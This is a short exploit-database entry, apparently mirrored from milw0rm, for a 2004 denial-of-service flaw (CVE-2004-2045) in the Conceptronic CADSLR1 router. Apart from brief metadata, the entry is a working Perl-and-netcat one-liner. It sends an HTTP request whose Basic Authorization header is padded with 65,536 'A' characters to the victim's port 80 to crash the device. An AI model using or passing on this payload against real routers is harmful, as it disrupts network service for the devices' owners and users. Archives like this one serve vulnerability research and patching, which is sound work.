Conceptronic CADSLR1 Router - Denial of Service



EKU-ID: 8647 CVE: OSVDB-8139;CVE-2004-2045 OSVDB-ID:
Author: Seth Alan Woolley Published: 2004-07-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


$ $victima="ip.victim"
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization:
Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80

# milw0rm.com [2004-07-22]